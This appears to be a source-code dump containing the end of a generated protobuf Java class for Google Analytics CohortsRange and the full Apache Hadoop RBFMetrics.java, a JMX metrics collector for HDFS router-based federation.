* next several granularity time periods. * * If `granularity` is `DAILY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset` days. * * If `granularity` is `WEEKLY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset * 7` days. * * If `granularity` is `MONTHLY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset * 30` days. * </pre> * * <code>int32 end_offset = 3;</code> * * @param value The endOffset to set. * @return This builder for chaining. */ public Builder setEndOffset(int value) { endOffset_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Required. `endOffset` specifies the end date of the extended reporting date * range for a cohort report. `endOffset` can be any positive integer but is * commonly set to 5 to 10 so that reports contain data on the cohort for the * next several granularity time periods. * * If `granularity` is `DAILY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset` days. * * If `granularity` is `WEEKLY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset * 7` days. * * If `granularity` is `MONTHLY`, the `endDate` of the extended reporting date * range is `endDate` of the cohort plus `endOffset * 30` days. * </pre> * * <code>int32 end_offset = 3;</code> * * @return This builder for chaining. */ public Builder clearEndOffset() { bitField0_ = (bitField0_ & ~0x00000004); endOffset_ = 0; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.analytics.data.v1beta.CohortsRange) } // @@protoc_insertion_point(class_scope:google.analytics.data.v1beta.CohortsRange) private static final com.google.analytics.data.v1beta.CohortsRange DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.analytics.data.v1beta.CohortsRange(); } public static com.google.analytics.data.v1beta.CohortsRange getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CohortsRange> PARSER = new com.google.protobuf.AbstractParser<CohortsRange>() { @java.lang.Override public CohortsRange parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CohortsRange> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CohortsRange> getParserForType() { return PARSER; } @java.lang.Override public com.google.analytics.data.v1beta.CohortsRange getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/hadoop
35,644
hadoop-hdfs-project/hadoop-hdfs-rbf/src/main/java/org/apache/hadoop/hdfs/server/federation/metrics/RBFMetrics.java
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hdfs.server.federation.metrics; import static org.apache.hadoop.hdfs.server.federation.router.async.utils.AsyncUtil.syncReturn; import static org.apache.hadoop.metrics2.impl.MsInfo.ProcessName; import static org.apache.hadoop.util.Time.now; import java.io.IOException; import java.lang.reflect.Method; import java.math.BigInteger; import java.net.InetAddress; import java.net.InetSocketAddress; import java.net.UnknownHostException; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.Date; import java.util.HashMap; import java.util.HashSet; import java.util.LinkedHashMap; import java.util.LinkedHashSet; import java.util.LinkedList; import java.util.List; import java.util.Map; import java.util.Set; import java.util.concurrent.TimeUnit; import java.util.function.Function; import java.util.function.ToIntFunction; import java.util.function.ToLongFunction; import java.util.stream.Collectors; import javax.management.NotCompliantMBeanException; import javax.management.ObjectName; import javax.management.StandardMBean; import org.apache.commons.math3.stat.descriptive.moment.StandardDeviation; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.hdfs.protocol.DatanodeInfo; import org.apache.hadoop.hdfs.protocol.HdfsConstants.DatanodeReportType; import org.apache.hadoop.hdfs.server.federation.resolver.ActiveNamenodeResolver; import org.apache.hadoop.hdfs.server.federation.resolver.FederationNamenodeContext; import org.apache.hadoop.hdfs.server.federation.resolver.FederationNamespaceInfo; import org.apache.hadoop.hdfs.server.federation.resolver.RemoteLocation; import org.apache.hadoop.hdfs.server.federation.router.RBFConfigKeys; import org.apache.hadoop.hdfs.server.federation.router.Router; import org.apache.hadoop.hdfs.server.federation.router.RouterRpcServer; import org.apache.hadoop.hdfs.server.federation.router.RouterServiceState; import org.apache.hadoop.hdfs.server.federation.router.security.RouterSecurityManager; import org.apache.hadoop.hdfs.server.federation.store.MembershipStore; import org.apache.hadoop.hdfs.server.federation.store.MountTableStore; import org.apache.hadoop.hdfs.server.federation.store.RouterStore; import org.apache.hadoop.hdfs.server.federation.store.StateStoreService; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetMountTableEntriesRequest; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetMountTableEntriesResponse; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetNamenodeRegistrationsRequest; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetNamenodeRegistrationsResponse; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetNamespaceInfoRequest; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetNamespaceInfoResponse; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetRouterRegistrationsRequest; import org.apache.hadoop.hdfs.server.federation.store.protocol.GetRouterRegistrationsResponse; import org.apache.hadoop.hdfs.server.federation.store.records.BaseRecord; import org.apache.hadoop.hdfs.server.federation.store.records.MembershipState; import org.apache.hadoop.hdfs.server.federation.store.records.MembershipStats; import org.apache.hadoop.hdfs.server.federation.store.records.MountTable; import org.apache.hadoop.hdfs.server.federation.store.records.RouterState; import org.apache.hadoop.hdfs.server.federation.store.records.StateStoreVersion; import org.apache.hadoop.hdfs.web.JsonUtil; import org.apache.hadoop.metrics2.MetricsSystem; import org.apache.hadoop.metrics2.annotation.Metric; import org.apache.hadoop.metrics2.annotation.Metrics; import org.apache.hadoop.metrics2.lib.DefaultMetricsSystem; import org.apache.hadoop.metrics2.lib.MetricsRegistry; import org.apache.hadoop.metrics2.util.MBeans; import org.apache.hadoop.metrics2.util.Metrics2Util; import org.apache.hadoop.security.UserGroupInformation; import org.apache.hadoop.util.StringUtils; import org.apache.hadoop.util.VersionInfo; import org.codehaus.jettison.json.JSONObject; import org.eclipse.jetty.util.ajax.JSON; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.apache.hadoop.classification.VisibleForTesting; /** * Implementation of the Router metrics collector. */ @Metrics(name="RBFActivity", about="RBF metrics", context="dfs") public class RBFMetrics implements RouterMBean, FederationMBean { private static final Logger LOG = LoggerFactory.getLogger(RBFMetrics.class); private final MetricsRegistry registry = new MetricsRegistry("RBFMetrics"); /** Format for a date. */ private static final String DATE_FORMAT = "yyyy/MM/dd HH:mm:ss"; /** Prevent holding the page from load too long. */ private final long timeOut; /** Enable/Disable getNodeUsage. **/ private boolean enableGetDNUsage; /** Router interface. */ private final Router router; /** FederationState JMX bean. */ private ObjectName routerBeanName; private ObjectName federationBeanName; /** Resolve the namenode for each namespace. */ private final ActiveNamenodeResolver namenodeResolver; /** State store. */ private final StateStoreService stateStore; /** Membership state store. */ private MembershipStore membershipStore; /** Mount table store. */ private MountTableStore mountTableStore; /** Router state store. */ private RouterStore routerStore; /** The number of top token owners reported in metrics. */ private int topTokenRealOwners; public RBFMetrics(Router router) throws IOException { this.router = router; try { StandardMBean bean = new StandardMBean(this, RouterMBean.class); this.routerBeanName = MBeans.register("Router", "Router", bean); LOG.info("Registered Router MBean: {}", this.routerBeanName); } catch (NotCompliantMBeanException e) { throw new RuntimeException("Bad Router MBean setup", e); } try { StandardMBean bean = new StandardMBean(this, FederationMBean.class); this.federationBeanName = MBeans.register("Router", "FederationState", bean); LOG.info("Registered FederationState MBean: {}", this.federationBeanName); } catch (NotCompliantMBeanException e) { throw new RuntimeException("Bad FederationState MBean setup", e); } // Resolve namenode for each nameservice this.namenodeResolver = this.router.getNamenodeResolver(); // State store interfaces this.stateStore = this.router.getStateStore(); if (this.stateStore == null) { LOG.error("State store not available"); } else { this.membershipStore = stateStore.getRegisteredRecordStore( MembershipStore.class); this.mountTableStore = stateStore.getRegisteredRecordStore( MountTableStore.class); this.routerStore = stateStore.getRegisteredRecordStore( RouterStore.class); } // Initialize the cache for the DN reports Configuration conf = router.getConfig(); this.timeOut = conf.getTimeDuration(RBFConfigKeys.DN_REPORT_TIME_OUT, RBFConfigKeys.DN_REPORT_TIME_OUT_MS_DEFAULT, TimeUnit.MILLISECONDS); this.enableGetDNUsage = conf.getBoolean(RBFConfigKeys.DFS_ROUTER_ENABLE_GET_DN_USAGE_KEY, RBFConfigKeys.DFS_ROUTER_ENABLE_GET_DN_USAGE_DEFAULT); this.topTokenRealOwners = conf.getInt( RBFConfigKeys.DFS_ROUTER_METRICS_TOP_NUM_TOKEN_OWNERS_KEY, RBFConfigKeys.DFS_ROUTER_METRICS_TOP_NUM_TOKEN_OWNERS_KEY_DEFAULT); registry.tag(ProcessName, "Router"); MetricsSystem ms = DefaultMetricsSystem.instance(); ms.register(RBFMetrics.class.getName(), "RBFActivity Metrics", this); } @VisibleForTesting public void setEnableGetDNUsage(boolean enableGetDNUsage) { this.enableGetDNUsage = enableGetDNUsage; } /** * Unregister the JMX beans. */ public void close() { if (this.routerBeanName != null) { MBeans.unregister(routerBeanName); } if (this.federationBeanName != null) { MBeans.unregister(federationBeanName); } MetricsSystem ms = DefaultMetricsSystem.instance(); ms.unregisterSource(RBFMetrics.class.getName()); } @Override public String getNamenodes() { final Map<String, Map<String, Object>> info = new LinkedHashMap<>(); if (membershipStore == null) { return "{}"; } try { // Get the values from the store GetNamenodeRegistrationsRequest request = GetNamenodeRegistrationsRequest.newInstance(); GetNamenodeRegistrationsResponse response = membershipStore.getNamenodeRegistrations(request); // Order the namenodes final List<MembershipState> namenodes = response.getNamenodeMemberships(); if (namenodes == null || namenodes.size() == 0) { return JSON.toString(info); } List<MembershipState> namenodesOrder = new ArrayList<>(namenodes); Collections.sort(namenodesOrder, MembershipState.NAME_COMPARATOR); // Dump namenodes information into JSON for (MembershipState namenode : namenodesOrder) { Map<String, Object> innerInfo = new HashMap<>(); Map<String, Object> map = getJson(namenode); innerInfo.putAll(map); long dateModified = namenode.getDateModified(); long lastHeartbeat = getSecondsSince(dateModified); innerInfo.put("lastHeartbeat", lastHeartbeat); MembershipStats stats = namenode.getStats(); long used = stats.getTotalSpace() - stats.getAvailableSpace(); innerInfo.put("used", used); info.put(namenode.getNamenodeKey(), Collections.unmodifiableMap(innerInfo)); } } catch (IOException e) { LOG.error("Enable to fetch json representation of namenodes {}", e.getMessage()); return "{}"; } return JSON.toString(info); } @Override public String getNameservices() { final Map<String, Map<String, Object>> info = new LinkedHashMap<>(); try { final List<MembershipState> namenodes = getActiveNamenodeRegistrations(); List<MembershipState> namenodesOrder = new ArrayList<>(namenodes); Collections.sort(namenodesOrder, MembershipState.NAME_COMPARATOR); // Dump namenodes information into JSON for (MembershipState namenode : namenodesOrder) { Map<String, Object> innerInfo = new HashMap<>(); Map<String, Object> map = getJson(namenode); innerInfo.putAll(map); long dateModified = namenode.getDateModified(); long lastHeartbeat = getSecondsSince(dateModified); innerInfo.put("lastHeartbeat", lastHeartbeat); MembershipStats stats = namenode.getStats(); long used = stats.getTotalSpace() - stats.getAvailableSpace(); innerInfo.put("used", used); info.put(namenode.getNamenodeKey(), Collections.unmodifiableMap(innerInfo)); } } catch (IOException e) { LOG.error("Cannot retrieve nameservices for JMX: {}", e.getMessage()); return "{}"; } return JSON.toString(info); } @Override public String getMountTable() { final List<Map<String, Object>> info = new LinkedList<>(); if (mountTableStore == null) { return "[]"; } try { // Get all the mount points in order GetMountTableEntriesRequest request = GetMountTableEntriesRequest.newInstance("/"); GetMountTableEntriesResponse response = mountTableStore.getMountTableEntries(request); final List<MountTable> mounts = response.getEntries(); List<MountTable> orderedMounts = new ArrayList<>(mounts); Collections.sort(orderedMounts, MountTable.SOURCE_COMPARATOR); // Dump mount table entries information into JSON for (MountTable entry : orderedMounts) { // Summarize destinations Set<String> nameservices = new LinkedHashSet<>(); Set<String> paths = new LinkedHashSet<>(); for (RemoteLocation location : entry.getDestinations()) { nameservices.add(location.getNameserviceId()); paths.add(location.getDest()); } Map<String, Object> map = getJson(entry); // We add some values with a cleaner format map.put("dateCreated", getDateString(entry.getDateCreated())); map.put("dateModified", getDateString(entry.getDateModified())); Map<String, Object> innerInfo = new HashMap<>(); innerInfo.putAll(map); innerInfo.put("nameserviceId", StringUtils.join(",", nameservices)); innerInfo.put("path", StringUtils.join(",", paths)); if (nameservices.size() > 1) { innerInfo.put("order", entry.getDestOrder().toString()); } else { innerInfo.put("order", ""); } innerInfo.put("readonly", entry.isReadOnly()); innerInfo.put("faulttolerant", entry.isFaultTolerant()); info.add(Collections.unmodifiableMap(innerInfo)); } } catch (IOException e) { LOG.error( "Cannot generate JSON of mount table from store: {}", e.getMessage()); return "[]"; } return JSON.toString(info); } @Override public String getRouters() { final Map<String, Map<String, Object>> info = new LinkedHashMap<>(); if (routerStore == null) { return "{}"; } try { // Get all the routers in order GetRouterRegistrationsRequest request = GetRouterRegistrationsRequest.newInstance(); GetRouterRegistrationsResponse response = routerStore.getRouterRegistrations(request); final List<RouterState> routers = response.getRouters(); List<RouterState> routersOrder = new ArrayList<>(routers); Collections.sort(routersOrder); // Dump router information into JSON for (RouterState record : routersOrder) { Map<String, Object> innerInfo = new HashMap<>(); Map<String, Object> map = getJson(record); innerInfo.putAll(map); long dateModified = record.getDateModified(); long lastHeartbeat = getSecondsSince(dateModified); innerInfo.put("lastHeartbeat", lastHeartbeat); StateStoreVersion stateStoreVersion = record.getStateStoreVersion(); if (stateStoreVersion == null) { LOG.error("Cannot get State Store versions"); } else { setStateStoreVersions(innerInfo, stateStoreVersion); } info.put(record.getPrimaryKey(), Collections.unmodifiableMap(innerInfo)); } } catch (IOException e) { LOG.error("Cannot get Routers JSON from the State Store", e); return "{}"; } return JSON.toString(info); } /** * Populate the map with the State Store versions. * * @param map Map with the information. * @param version State Store versions. */ private static void setStateStoreVersions( Map<String, Object> map, StateStoreVersion version) { long membershipVersion = version.getMembershipVersion(); String lastMembershipUpdate = getDateString(membershipVersion); map.put("lastMembershipUpdate", lastMembershipUpdate); long mountTableVersion = version.getMountTableVersion(); String lastMountTableDate = getDateString(mountTableVersion); map.put("lastMountTableUpdate", lastMountTableDate); } @Override public long getTotalCapacity() { return getNameserviceAggregatedLong(MembershipStats::getTotalSpace); } @Override public long getRemainingCapacity() { return getNameserviceAggregatedLong(MembershipStats::getAvailableSpace); } @Override public long getUsedCapacity() { return getTotalCapacity() - getRemainingCapacity(); } @Override public BigInteger getTotalCapacityBigInt() { return getNameserviceAggregatedBigInt(MembershipStats::getTotalSpace); } @Override public BigInteger getRemainingCapacityBigInt() { return getNameserviceAggregatedBigInt(MembershipStats::getAvailableSpace); } @Override public long getProvidedSpace() { return getNameserviceAggregatedLong(MembershipStats::getProvidedSpace); } @Override public BigInteger getUsedCapacityBigInt() { return getTotalCapacityBigInt().subtract(getRemainingCapacityBigInt()); } @Override public int getNumNameservices() { try { Set<FederationNamespaceInfo> nss = namenodeResolver.getNamespaces(); return nss.size(); } catch (IOException e) { LOG.error( "Cannot fetch number of expired registrations from the store: {}", e.getMessage()); return 0; } } @Override public int getNumNamenodes() { if (membershipStore == null) { return 0; } try { GetNamenodeRegistrationsRequest request = GetNamenodeRegistrationsRequest.newInstance(); GetNamenodeRegistrationsResponse response = membershipStore.getNamenodeRegistrations(request); List<MembershipState> memberships = response.getNamenodeMemberships(); return memberships.size(); } catch (IOException e) { LOG.error("Cannot retrieve numNamenodes for JMX: {}", e.getMessage()); return 0; } } @Override public int getNumExpiredNamenodes() { if (membershipStore == null) { return 0; } try { GetNamenodeRegistrationsRequest request = GetNamenodeRegistrationsRequest.newInstance(); GetNamenodeRegistrationsResponse response = membershipStore.getExpiredNamenodeRegistrations(request); List<MembershipState> expiredMemberships = response.getNamenodeMemberships(); return expiredMemberships.size(); } catch (IOException e) { LOG.error( "Cannot retrieve numExpiredNamenodes for JMX: {}", e.getMessage()); return 0; } } @Override @Metric({"NumLiveNodes", "Number of live data nodes"}) public int getNumLiveNodes() { return getNameserviceAggregatedInt( MembershipStats::getNumOfActiveDatanodes); } @Override @Metric({"NumDeadNodes", "Number of dead data nodes"}) public int getNumDeadNodes() { return getNameserviceAggregatedInt(MembershipStats::getNumOfDeadDatanodes); } @Override @Metric({"NumStaleNodes", "Number of stale data nodes"}) public int getNumStaleNodes() { return getNameserviceAggregatedInt( MembershipStats::getNumOfStaleDatanodes); } @Override @Metric({"NumDecommissioningNodes", "Number of Decommissioning data nodes"}) public int getNumDecommissioningNodes() { return getNameserviceAggregatedInt( MembershipStats::getNumOfDecommissioningDatanodes); } @Override @Metric({"NumDecomLiveNodes", "Number of decommissioned Live data nodes"}) public int getNumDecomLiveNodes() { return getNameserviceAggregatedInt( MembershipStats::getNumOfDecomActiveDatanodes); } @Override @Metric({"NumDecomDeadNodes", "Number of decommissioned dead data nodes"}) public int getNumDecomDeadNodes() { return getNameserviceAggregatedInt( MembershipStats::getNumOfDecomDeadDatanodes); } @Override @Metric({"NumInMaintenanceLiveDataNodes", "Number of IN_MAINTENANCE live data nodes"}) public int getNumInMaintenanceLiveDataNodes() { return getNameserviceAggregatedInt( MembershipStats::getNumOfInMaintenanceLiveDataNodes); } @Override @Metric({"NumInMaintenanceDeadDataNodes", "Number of IN_MAINTENANCE dead data nodes"}) public int getNumInMaintenanceDeadDataNodes() { return getNameserviceAggregatedInt( MembershipStats::getNumOfInMaintenanceDeadDataNodes); } @Override @Metric({"NumEnteringMaintenanceDataNodes", "Number of ENTERING_MAINTENANCE data nodes"}) public int getNumEnteringMaintenanceDataNodes() { return getNameserviceAggregatedInt( MembershipStats::getNumOfEnteringMaintenanceDataNodes); } @Override // NameNodeMXBean public String getNodeUsage() { double median = 0; double max = 0; double min = 0; double dev = 0; final Map<String, Map<String, Object>> info = new HashMap<>(); try { DatanodeInfo[] live = null; if (this.enableGetDNUsage) { RouterRpcServer rpcServer = this.router.getRpcServer(); if (rpcServer.isAsync()) { rpcServer.getDatanodeReportAsync(DatanodeReportType.LIVE, false, timeOut); live = syncReturn(DatanodeInfo[].class); } else { live = rpcServer.getDatanodeReport(DatanodeReportType.LIVE, false, timeOut); } } else { LOG.debug("Getting node usage is disabled."); } if (live != null && live.length > 0) { double[] usages = new double[live.length]; int i = 0; for (DatanodeInfo dn : live) { usages[i++] = dn.getDfsUsedPercent(); } Arrays.sort(usages); median = usages[usages.length / 2]; max = usages[usages.length - 1]; min = usages[0]; StandardDeviation deviation = new StandardDeviation(); dev = deviation.evaluate(usages); } } catch (Exception e) { LOG.error("Cannot get the live nodes: {}", e.getMessage()); } final Map<String, Object> innerInfo = new HashMap<>(); innerInfo.put("min", StringUtils.format("%.2f%%", min)); innerInfo.put("median", StringUtils.format("%.2f%%", median)); innerInfo.put("max", StringUtils.format("%.2f%%", max)); innerInfo.put("stdDev", StringUtils.format("%.2f%%", dev)); info.put("nodeUsage", innerInfo); return JSON.toString(info); } @Override @Metric({"NumBlocks", "Total number of blocks"}) public long getNumBlocks() { return getNameserviceAggregatedLong(MembershipStats::getNumOfBlocks); } @Override @Metric({"NumOfMissingBlocks", "Number of missing blocks"}) public long getNumOfMissingBlocks() { return getNameserviceAggregatedLong(MembershipStats::getNumOfBlocksMissing); } @Override @Metric({"NumOfBlocksPendingReplication", "Number of blocks pending replication"}) public long getNumOfBlocksPendingReplication() { return getNameserviceAggregatedLong( MembershipStats::getNumOfBlocksPendingReplication); } @Override @Metric({"NumOfBlocksUnderReplicated", "Number of blocks under replication"}) public long getNumOfBlocksUnderReplicated() { return getNameserviceAggregatedLong( MembershipStats::getNumOfBlocksUnderReplicated); } @Override @Metric({"NumOfBlocksPendingDeletion", "Number of blocks pending deletion"}) public long getNumOfBlocksPendingDeletion() { return getNameserviceAggregatedLong( MembershipStats::getNumOfBlocksPendingDeletion); } @Override @Metric({"NumFiles", "Number of files"}) public long getNumFiles() { return getNameserviceAggregatedLong(MembershipStats::getNumOfFiles); } @Override public String getRouterStarted() { long startTime = this.router.getStartTime(); return new Date(startTime).toString(); } @Override public String getVersion() { return VersionInfo.getVersion() + ", r" + VersionInfo.getRevision(); } @Override public String getCompiledDate() { return VersionInfo.getDate(); } @Override public String getCompileInfo() { return VersionInfo.getDate() + " by " + VersionInfo.getUser() + " from " + VersionInfo.getBranch(); } @Override public String getHostAndPort() { InetSocketAddress address = this.router.getRpcServerAddress(); if (address != null) { try { String hostname = InetAddress.getLocalHost().getHostName(); int port = address.getPort(); return hostname + ":" + port; } catch (UnknownHostException ignored) { } } return "Unknown"; } @Override public String getRouterId() { return this.router.getRouterId(); } @Override public String getClusterId() { try { Collection<String> clusterIds = getNamespaceInfo(FederationNamespaceInfo::getClusterId); return clusterIds.toString(); } catch (IOException e) { LOG.error("Cannot fetch cluster ID metrics: {}", e.getMessage()); return ""; } } @Override public String getBlockPoolId() { try { Collection<String> blockpoolIds = getNamespaceInfo(FederationNamespaceInfo::getBlockPoolId); return blockpoolIds.toString(); } catch (IOException e) { LOG.error("Cannot fetch block pool ID metrics: {}", e.getMessage()); return ""; } } @Override public String getRouterStatus() { return this.router.getRouterState().toString(); } @Override @Metric({"CurrentTokensCount", "Number of router's current tokens"}) public long getCurrentTokensCount() { RouterSecurityManager mgr = this.router.getRpcServer().getRouterSecurityManager(); if (mgr != null && mgr.getSecretManager() != null) { return mgr.getSecretManager().getCurrentTokensSize(); } return -1; } @Override public String getTopTokenRealOwners() { String topTokenRealOwnersString = ""; RouterSecurityManager mgr = this.router.getRpcServer().getRouterSecurityManager(); if (mgr != null && mgr.getSecretManager() != null) { try { List<Metrics2Util.NameValuePair> topOwners = mgr.getSecretManager() .getTopTokenRealOwners(this.topTokenRealOwners); topTokenRealOwnersString = JsonUtil.toJsonString(topOwners); } catch (Exception e) { LOG.error("Unable to fetch the top token real owners as string {}", e.getMessage()); } } return topTokenRealOwnersString; } @Override public boolean isSecurityEnabled() { return UserGroupInformation.isSecurityEnabled(); } @Override public int getCorruptFilesCount() { return getNameserviceAggregatedInt(MembershipStats::getCorruptFilesCount); } @Override public long getScheduledReplicationBlocks() { return getNameserviceAggregatedLong( MembershipStats::getScheduledReplicationBlocks); } @Override public long getNumberOfMissingBlocksWithReplicationFactorOne() { return getNameserviceAggregatedLong( MembershipStats::getNumberOfMissingBlocksWithReplicationFactorOne); } @Override public long getHighestPriorityLowRedundancyReplicatedBlocks() { return getNameserviceAggregatedLong( MembershipStats::getHighestPriorityLowRedundancyReplicatedBlocks); } @Override public long getNumberOfBadlyDistributedBlocks() { return getNameserviceAggregatedLong( MembershipStats::getNumberOfBadlyDistributedBlocks); } @Override public long getHighestPriorityLowRedundancyECBlocks() { return getNameserviceAggregatedLong( MembershipStats::getHighestPriorityLowRedundancyECBlocks); } @Override public int getPendingSPSPaths() { return getNameserviceAggregatedInt( MembershipStats::getPendingSPSPaths); } @Override @Metric({"RouterFederationRenameCount", "Number of federation rename"}) public int getRouterFederationRenameCount() { return this.router.getRpcServer().getRouterFederationRenameCount(); } @Override @Metric({"SchedulerJobCount", "Number of scheduler job"}) public int getSchedulerJobCount() { return this.router.getRpcServer().getSchedulerJobCount(); } @Override public String getSafemode() { if (this.router.isRouterState(RouterServiceState.SAFEMODE)) { return "Safe mode is ON. " + this.getSafeModeTip(); } else { return ""; } } private String getSafeModeTip() { String cmd = "Use \"hdfs dfsrouteradmin -safemode leave\" " + "to turn safe mode off."; if (this.router.isRouterState(RouterServiceState.INITIALIZING) || this.router.isRouterState(RouterServiceState.UNINITIALIZED)) { return "Router is in" + this.router.getRouterState() + "mode, the router will immediately return to " + "normal mode after some time. " + cmd; } else if (this.router.isRouterState(RouterServiceState.SAFEMODE)) { return "It was turned on manually. " + cmd; } return ""; } /** * Build a set of unique values found in all namespaces. * * @param f Method reference of the appropriate FederationNamespaceInfo * getter function * @return Set of unique string values found in all discovered namespaces. * @throws IOException if the query could not be executed. */ private Collection<String> getNamespaceInfo( Function<FederationNamespaceInfo, String> f) throws IOException { if (membershipStore == null) { return new HashSet<>(); } GetNamespaceInfoRequest request = GetNamespaceInfoRequest.newInstance(); GetNamespaceInfoResponse response = membershipStore.getNamespaceInfo(request); return response.getNamespaceInfo().stream() .map(f) .collect(Collectors.toSet()); } /** * Get the aggregated value for a method for all nameservices. * @param f Method reference * @return Aggregated integer. */ private int getNameserviceAggregatedInt(ToIntFunction<MembershipStats> f) { try { return getActiveNamenodeRegistrations().stream() .map(MembershipState::getStats) .collect(Collectors.summingInt(f)); } catch (IOException e) { LOG.error("Unable to extract metrics: {}", e.getMessage()); return 0; } } /** * Get the aggregated value for a method for all nameservices. * @param f Method reference * @return Aggregated long. */ private long getNameserviceAggregatedLong(ToLongFunction<MembershipStats> f) { try { return getActiveNamenodeRegistrations().stream() .map(MembershipState::getStats) .collect(Collectors.summingLong(f)); } catch (IOException e) { LOG.error("Unable to extract metrics: {}", e.getMessage()); return 0; } } private BigInteger getNameserviceAggregatedBigInt( ToLongFunction<MembershipStats> f) { try { List<MembershipState> states = getActiveNamenodeRegistrations(); BigInteger sum = BigInteger.valueOf(0); for (MembershipState state : states) { long lvalue = f.applyAsLong(state.getStats()); sum = sum.add(BigInteger.valueOf(lvalue)); } return sum; } catch (IOException e) { LOG.error("Unable to extract metrics: {}", e.getMessage()); return new BigInteger("0"); } } /** * Fetches the most active namenode memberships for all known nameservices. * The fetched membership may or may not be active. Excludes expired * memberships. * @throws IOException if the query could not be performed. * @return List of the most active NNs from each known nameservice. */ private List<MembershipState> getActiveNamenodeRegistrations() throws IOException { List<MembershipState> resultList = new ArrayList<>(); if (membershipStore == null) { return resultList; } GetNamespaceInfoRequest request = GetNamespaceInfoRequest.newInstance(); GetNamespaceInfoResponse response = membershipStore.getNamespaceInfo(request); for (FederationNamespaceInfo nsInfo : response.getNamespaceInfo()) { // Fetch the most recent namenode registration String nsId = nsInfo.getNameserviceId(); List<? extends FederationNamenodeContext> nns = namenodeResolver.getNamenodesForNameserviceId(nsId, false); if (nns != null) { FederationNamenodeContext nn = nns.get(0); if (nn instanceof MembershipState) { resultList.add((MembershipState) nn); } } } return resultList; } /** * Get time as a date string. * @param time Seconds since 1970. * @return String representing the date. */ @VisibleForTesting static String getDateString(long time) { if (time <= 0) { return "-"; } Date date = new Date(time); SimpleDateFormat sdf = new SimpleDateFormat(DATE_FORMAT); return sdf.format(date); } /** * Get the number of seconds passed since a date. * * @param timeMs to use as a reference. * @return Seconds since the date. */ private static long getSecondsSince(long timeMs) { if (timeMs < 0) { return -1; } return (now() - timeMs) / 1000; } /** * Get JSON for this record. * * @return Map representing the data for the JSON representation. */ private static Map<String, Object> getJson(BaseRecord record) { Map<String, Object> json = new HashMap<>(); Map<String, Class<?>> fields = getFields(record); for (String fieldName : fields.keySet()) { if (!fieldName.equalsIgnoreCase("proto")) { try { Object value = getField(record, fieldName); if (value instanceof BaseRecord) { BaseRecord recordField = (BaseRecord) value; json.putAll(getJson(recordField)); } else { json.put(fieldName, value == null ? JSONObject.NULL : value); } } catch (Exception e) { throw new IllegalArgumentException( "Cannot serialize field " + fieldName + " into JSON"); } } } return json; } /** * Returns all serializable fields in the object. * * @return Map with the fields. */ private static Map<String, Class<?>> getFields(BaseRecord record) { Map<String, Class<?>> getters = new HashMap<>(); for (Method m : record.getClass().getDeclaredMethods()) { if (m.getName().startsWith("get")) { try { Class<?> type = m.getReturnType(); char[] c = m.getName().substring(3).toCharArray(); c[0] = Character.toLowerCase(c[0]); String key = new String(c); getters.put(key, type); } catch (Exception e) { LOG.error("Cannot execute getter {} on {}", m.getName(), record); } } } return getters; } /** * Fetches the value for a field name. * * @param fieldName the legacy name of the field. * @return The field data or null if not found. */ private static Object getField(BaseRecord record, String fieldName) { Object result = null; Method m = locateGetter(record, fieldName); if (m != null) { try { result = m.invoke(record); } catch (Exception e) { LOG.error("Cannot get field {} on {}", fieldName, record); } } return result; } /** * Finds the appropriate getter for a field name. * * @param fieldName The legacy name of the field. * @return The matching getter or null if not found. */ private static Method locateGetter(BaseRecord record, String fieldName) { for (Method m : record.getClass().getMethods()) { if (m.getName().equalsIgnoreCase("get" + fieldName)) { return m; } } return null; } }
apache/systemds
33,775
src/main/java/org/apache/sysds/runtime/compress/colgroup/ColGroupSDCSingleZeros.java
